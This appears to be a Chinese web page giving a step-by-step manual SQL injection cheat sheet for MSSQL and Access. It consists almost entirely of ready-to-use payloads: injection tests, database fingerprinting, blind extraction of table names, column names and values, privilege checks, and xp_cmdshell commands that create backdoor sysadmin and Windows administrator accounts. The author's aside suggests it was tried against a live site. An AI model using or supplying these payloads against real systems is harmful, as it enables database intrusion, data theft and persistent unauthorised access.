溫馨提示×
您好,登錄后才能下訂單哦!
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
您好,登錄后才能下訂單哦!
1.判斷是否有注入
and 1=1
and 1=2
判斷注入的方法是一樣的
2.初步判斷是否是mssql
and user>0
3.判斷數據庫系統
and (select count(*) from sysobjects)>0 mssql
and (select count(*) from msysobjects)>0 access
4.注入參數是字符
'and [查詢條件] and ''='
5.搜索時沒過濾參數的
'and [查詢條件] and '%25'='
6.猜數表名
and (select Count(*) from [表名])>0
這個比較蛋疼,總共有3oo多個數據庫我手工沒有猜出來,有神器sqlmap跑的都顯示不完,剛才返回錯誤,如果填上正確的表名就行了,下面是猜字段,其實和access數據庫差不懂,學這個就得會舉一反三,這是一些步驟和語句,我給大家自己看吧,主要是這個站比較蛋疼,對了工具的使用會在以后的教程中介紹,學這個要先學會原理,只知道用工具注入也沒有什么意思,要學會原理,有自己的思路,然后自己寫工具才有成就感
7.猜字段
and (select Count(字段名) from 表名)>0
8.猜字段中記錄長度
and (select top 1 len(字段名) from 表名)>0
9.(1)猜字段的ascii值(access)
and (select top 1 asc(mid(字段名,1,1)) from 表名)>0
(2)猜字段的ascii值(mssql)
and (select top 1 unicode(substring(字段名,1,1)) from 表名)>0
10.測試權限結構(mssql)
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--
and 1=(select IS_SRVROLEMEMBER('serveradmin'));--
and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
and 1=(select IS_SRVROLEMEMBER('diskadmin'));--
and 1=(select IS_SRVROLEMEMBER('bulkadmin'));--
and 1=(select IS_MEMBER('db_owner'));--
11.添加mssql和系統的帳戶
exec master.dbo.sp_addlogin username;--
exec master.dbo.sp_password null,username,password;--
exec master.dbo.sp_addsrvrolemember sysadmin username;--
exec master.dbo.xp_cmdshell 'net user username password /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add';--
exec master.dbo.xp_cmdshell 'net user username password /add';--
exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';--
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。
